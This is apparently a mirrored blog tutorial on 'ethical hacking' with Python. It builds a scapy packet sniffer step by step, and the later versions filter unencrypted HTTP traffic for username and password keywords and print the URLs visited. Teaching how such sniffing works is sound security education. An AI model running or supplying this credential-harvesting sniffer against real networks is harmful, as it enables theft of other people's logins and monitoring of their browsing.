zoukankan      html  css  js  c++  java
  • Python Ethical Hacking

    PACKET_SNIFFER

    • Capture data flowing through an interface.
    • Filter this data.
    • Display Interesting information such as:
      • Login info(username&password).
      • Visited websites.
      • Images.
      • ...etc

    PACKET_SNIFFER

    CAPTURE & FILTER DATA

    • scapy has a sniffer function.
    • Can capture data sent to/from iface.
    • Can call a function specified in prn on each packet.

    Install the third party package.

     pip install scapy_http

    1. Write the Python to sniff all the Raw packets.

    #!/usr/bin/env python
    
    from scapy.all import *
    from scapy.layers.http import *
    
    def sniff(interface):
        scapy.all.sniff(iface=interface, store=False, prn=process_sniffed_packet)
    
    def process_sniffed_packet(packet):
        if packet.haslayer(HTTPRequest):
            if packet.haslayer(scapy.all.Raw):
                print(packet.show())
    
    sniff("eth0")

    Execute the script and sniff the packets on eth0.

    2. Filter the useful packets

    #!/usr/bin/env python
    
    from scapy.all import *
    from scapy.layers.http import *
    
    def sniff(interface):
        scapy.all.sniff(iface=interface, store=False, prn=process_sniffed_packet)
    
    def process_sniffed_packet(packet):
        if packet.haslayer(HTTPRequest):
            if packet.haslayer(scapy.all.Raw):
                print(packet[scapy.all.Raw].load)
    
    sniff("eth0")

     Execute the script and sniff the packets on eth0.

    Rewrite the Python Script to filter the keywords.

    #!/usr/bin/env python
    
    from scapy.all import *
    from scapy.layers.http import *
    
    
    def sniff(interface):
        scapy.all.sniff(iface=interface, store=False, prn=process_sniffed_packet)
    
    
    def process_sniffed_packet(packet):
        if packet.haslayer(HTTPRequest):
            if packet.haslayer(scapy.all.Raw):
                load = packet[scapy.all.Raw].load.decode(errors='ignore')
                keywords = ["username", "user", "login", "password", "pass"]
                for keyword in keywords:
                    if keyword in load:
                        print(load)
                        break
    
    
    sniff("eth0")

     Add the feature - Extracting URL

    #!/usr/bin/env python
    
    from scapy.all import *
    from scapy.layers.http import *
    
    
    def sniff(interface):
        scapy.all.sniff(iface=interface, store=False, prn=process_sniffed_packet)
    
    
    def process_sniffed_packet(packet):
        if packet.haslayer(HTTPRequest):
            url = packet[HTTPRequest].Host + packet[HTTPRequest].Path
            print(url)
    
            if packet.haslayer(scapy.all.Raw):
                load = packet[scapy.all.Raw].load.decode(errors='ignore')
                keywords = ["username", "user", "login", "password", "pass"]
                for keyword in keywords:
                    if keyword in load:
                        print(load)
                        break
    
    
    sniff("eth0")

    相信未来 - 该面对的绝不逃避,该执著的永不怨悔,该舍弃的不再留念,该珍惜的好好把握。
  • 相关阅读:
    TestNg线程池配置、执行次数配置、超时配置
    testng.xml文件结构组成及节点属性说明
    ReportNg 测试报告的定制修改【转】
    TestNg依赖详解(三)------灵活的文件配置依赖
    TestNg依赖高级用法之强制依赖与顺序依赖------TestNg依赖详解(二)
    TestNg依赖配置基础用法(单一方法依赖)------TestNg依赖详解(一)
    compareTo,Comparator和equals
    HashMap源码解析
    redis的相关知识
    IO模型
  • 原文地址:https://www.cnblogs.com/keepmoving1113/p/11386213.html
Copyright © 2011-2022 走看看